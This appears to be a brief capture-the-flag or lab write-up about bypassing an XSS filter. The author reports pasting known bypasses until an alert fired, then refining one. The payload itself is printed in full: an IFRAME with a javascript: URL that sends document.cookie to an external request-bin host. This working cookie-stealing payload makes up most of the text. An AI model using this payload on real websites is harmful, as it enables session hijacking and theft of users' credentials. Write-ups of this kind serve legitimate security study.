Last updated 4 years ago
Just pasted xss filter bypasses until one gave an alert('xss'), then refined it to send us the cookie.
(HTTPS was required)
<IFRAME SRC="javascript:document.location='https://hookb.in/b9gRBDkwpJT3DDogQ73Q?test='+document.cookie"></IFRAME>